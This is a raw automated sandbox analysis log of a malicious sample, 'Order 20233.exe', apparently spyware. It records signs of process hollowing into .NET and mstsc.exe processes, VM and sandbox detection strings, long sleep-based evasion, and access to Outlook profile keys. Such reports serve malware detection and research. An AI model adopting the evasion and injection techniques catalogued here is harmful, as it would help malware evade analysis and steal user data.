        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_01899910
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018998F0 NtReadVirtualMemory,LdrInitializeThunk,17_2_018998F0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899840 NtDelayExecution,LdrInitializeThunk,17_2_01899840
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899860 NtQuerySystemInformation,LdrInitializeThunk,17_2_01899860
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899A00 NtProtectVirtualMemory,LdrInitializeThunk,17_2_01899A00
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899A20 NtResumeThread,LdrInitializeThunk,17_2_01899A20
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899A50 NtCreateFile,LdrInitializeThunk,17_2_01899A50
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018995D0 NtClose,LdrInitializeThunk,17_2_018995D0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899540 NtReadFile,LdrInitializeThunk,17_2_01899540
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899780 NtMapViewOfSection,LdrInitializeThunk,17_2_01899780
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018997A0 NtUnmapViewOfSection,LdrInitializeThunk,17_2_018997A0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899FE0 NtCreateMutant,LdrInitializeThunk,17_2_01899FE0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899710 NtQueryInformationToken,LdrInitializeThunk,17_2_01899710
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018996E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_018996E0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_01899660
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018999D0 NtCreateProcessEx,17_2_018999D0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899950 NtQueueApcThread,17_2_01899950
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018998A0 NtWriteVirtualMemory,17_2_018998A0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899820 NtEnumerateKey,17_2_01899820
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0189B040 NtSuspendThread,17_2_0189B040
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0189A3B0 NtGetContextThread,17_2_0189A3B0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899B00 NtSetValueKey,17_2_01899B00
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899A80 NtOpenDirectoryObject,17_2_01899A80
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899A10 NtQuerySection,17_2_01899A10
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018995F0 NtQueryInformationFile,17_2_018995F0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899520 NtWaitForSingleObject,17_2_01899520
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0189AD30 NtSetContextThread,17_2_0189AD30
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899560 NtWriteFile,17_2_01899560
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0189A710 NtOpenProcessToken,17_2_0189A710
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899730 NtQueryVirtualMemory,17_2_01899730
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899760 NtOpenProcess,17_2_01899760
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0189A770 NtOpenThread,17_2_0189A770
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899770 NtSetInformationFile,17_2_01899770
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018996D0 NtCreateKey,17_2_018996D0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899610 NtEnumerateValueKey,17_2_01899610
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899650 NtQueryValueKey,17_2_01899650
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01899670 NtQueryInformationProcess,17_2_01899670
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041E097 NtAllocateVirtualMemory,17_2_0041E097
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_004012A7 NtProtectVirtualMemory,17_2_004012A7
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041DEB7 NtCreateFile,17_2_0041DEB7
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041DF67 NtReadFile,17_2_0041DF67
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041DFE7 NtClose,17_2_0041DFE7
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041E091 NtAllocateVirtualMemory,17_2_0041E091
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_004014E9 NtProtectVirtualMemory,17_2_004014E9
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041DEB1 NtCreateFile,17_2_0041DEB1
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041DFE2 NtClose,17_2_0041DFE2
        Source: Order 20233.exeStatic PE information: No import functions for PE file found
        Source: Order 20233.exe, 00000000.00000002.316784972.00000217728BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order 20233.exe
        Source: Order 20233.exe, 00000000.00000002.317830281.00000217742B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRunpeX.Stub.Framework.exeL vs Order 20233.exe
        Source: Order 20233.exe, 00000000.00000002.312683792.0000021710011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRunpeX.Stub.Framework.exeL vs Order 20233.exe
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprocexp.SysB vs Order 20233.exe
        Source: Order 20233.exeReversingLabs: Detection: 51%
        Source: Order 20233.exeVirustotal: Detection: 40%
        Source: Order 20233.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Order 20233.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\Order 20233.exe C:\Users\user\Desktop\Order 20233.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
        Source: C:\Users\user\Desktop\Order 20233.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
        Source: C:\Windows\SysWOW64\mstsc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
        Source: C:\Users\user\Desktop\Order 20233.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Order 20233.exe.log
        Source: C:\Windows\SysWOW64\mstsc.exeFile created: C:\Users\user\AppData\Local\Temp\4184-48M
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@22/2@2/1
        Source: Order 20233.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
        Source: C:\Users\user\Desktop\Order 20233.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
        Source: Order 20233.exe, moabGi8lf8iend/moabGu5ss.csBase64 encoded string
        Source: Order 20233.exe, moabDefe1da1t/moab0ecade.csCryptographic APIs: 'TransformFinalBlock'
        Source: Order 20233.exe, moabDefe1da1t/moab0ecade.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\Order 20233.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Order 20233.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Order 20233.exeStatic file information: File size 1827328 > 1048576
        Source: Order 20233.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: Order 20233.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1bde00
        Source: Order 20233.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Order 20233.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: AddInProcess32.pdb source: mstsc.exe, 00000015.00000002.533525731.00000000054E3000.00000004.10000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000011.00000003.308531715.0000000001697000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.305774318.00000000014FF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.431126939.0000000005003000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.531941308.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.428147207.0000000004E69000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.533058558.00000000052BF000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000011.00000003.308531715.0000000001697000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.305774318.00000000014FF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.431126939.0000000005003000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.531941308.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.428147207.0000000004E69000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.533058558.00000000052BF000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000011.00000003.416107815.000000000386B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.420075103.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: AddInProcess32.pdbpw source: mstsc.exe, 00000015.00000002.533525731.00000000054E3000.00000004.10000000.00040000.00000000.sdmp
        Source: Binary string: c:\TeamCity\buildAgent\work\5644082abfe4d909\EFBuild\obj\Release\Migrate\migrate.pdb source: Order 20233.exe
        Source: Binary string: mstsc.pdb source: AddInProcess32.exe, 00000011.00000003.416107815.000000000386B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.420075103.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\Order 20233.exeCode function: 0_2_000002177258A635 pushfq ; retf 0_2_000002177258A636
        Source: C:\Users\user\Desktop\Order 20233.exeCode function: 0_2_00007FFBAD3881DE push eax; ret 0_2_00007FFBAD3881ED
        Source: C:\Users\user\Desktop\Order 20233.exeCode function: 0_2_00007FFBAD3881C3 pushad ; ret 0_2_00007FFBAD3881DD
        Source: C:\Users\user\Desktop\Order 20233.exeCode function: 0_2_00007FFBAD387F17 push ebx; ret 0_2_00007FFBAD387F1A
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018AD0D1 push ecx; ret 17_2_018AD0E4
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_004210F9 push eax; ret 17_2_004210FF
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0040A0FE push ds; ret 17_2_0040A104
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_004210AC push eax; ret 17_2_004210FF
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_00421163 push eax; ret 17_2_00421169
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_00421102 push eax; ret 17_2_00421169
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_004082D9 pushad ; ret 17_2_004082DB
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041B2F7 push edi; ret 17_2_0041B319
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041AA83 push ecx; ret 17_2_0041AA8A
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0040CAAF pushad ; ret 17_2_0040CAB0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041AABE push ebx; ret 17_2_0041AABF
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041AB17 push edx; retf 17_2_0041AB26
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0041AC8C push es; retf 17_2_0041AC8D
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_00419F2C pushfd ; ret 17_2_00419F2D
        Source: C:\Users\user\Desktop\Order 20233.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Yara matchFile source: Process Memory Space: Order 20233.exe PID: 5872, type: MEMORYSTR
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\Desktop\Order 20233.exe TID: 6048Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01886B90 rdtsc 17_2_01886B90
        Source: C:\Users\user\Desktop\Order 20233.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeAPI coverage: 8.3 %
        Source: C:\Users\user\Desktop\Order 20233.exeProcess information queried: ProcessInformation
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
        Source: explorer.exe, 00000014.00000000.332547025.00000000090D8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: Order 20233.exe | Binary or memory string: krW0yvrDWyLEsalvv9+gJn4HXY2Vl3oUSouBYpABUpILCnMKeZOCp4tGtHKoVCk8NpdWGHrn5rVTmS77oiljOkKoFUpHgfs9AD+dv7F0vkXKD8MG11HzATdEKuZ0Wj8hJq
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
        Source: explorer.exe, 00000014.00000000.359291499.0000000007166000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
        Source: explorer.exe, 00000014.00000000.332547025.00000000090D8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
        Source: explorer.exe, 00000014.00000000.366252688.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
        Source: explorer.exe, 00000014.00000000.332547025.00000000090D8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
        Source: explorer.exe, 00000014.00000000.354585161.0000000005063000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
        Source: explorer.exe, 00000014.00000000.366252688.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: C:\Users\user\Desktop\Order 20233.exe | Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe | Code function: 17_2_0187C182 mov eax, dword ptr fs:[00000030h] 17_2_0187C182
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D6CF0 mov eax, dword ptr fs:[00000030h]17_2_018D6CF0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D6CF0 mov eax, dword ptr fs:[00000030h]17_2_018D6CF0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D6C0A mov eax, dword ptr fs:[00000030h]17_2_018D6C0A
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D6C0A mov eax, dword ptr fs:[00000030h]17_2_018D6C0A
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D6C0A mov eax, dword ptr fs:[00000030h]17_2_018D6C0A
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D6C0A mov eax, dword ptr fs:[00000030h]17_2_018D6C0A
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]17_2_01911C06
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0192740D mov eax, dword ptr fs:[00000030h]17_2_0192740D
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0192740D mov eax, dword ptr fs:[00000030h]17_2_0192740D
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0192740D mov eax, dword ptr fs:[00000030h]17_2_0192740D
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0188BC2C mov eax, dword ptr fs:[00000030h]17_2_0188BC2C
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0188A44B mov eax, dword ptr fs:[00000030h]17_2_0188A44B
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018EC450 mov eax, dword ptr fs:[00000030h]17_2_018EC450
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018EC450 mov eax, dword ptr fs:[00000030h]17_2_018EC450
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0187746D mov eax, dword ptr fs:[00000030h]17_2_0187746D
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01868794 mov eax, dword ptr fs:[00000030h]17_2_01868794
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D7794 mov eax, dword ptr fs:[00000030h]17_2_018D7794
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D7794 mov eax, dword ptr fs:[00000030h]17_2_018D7794
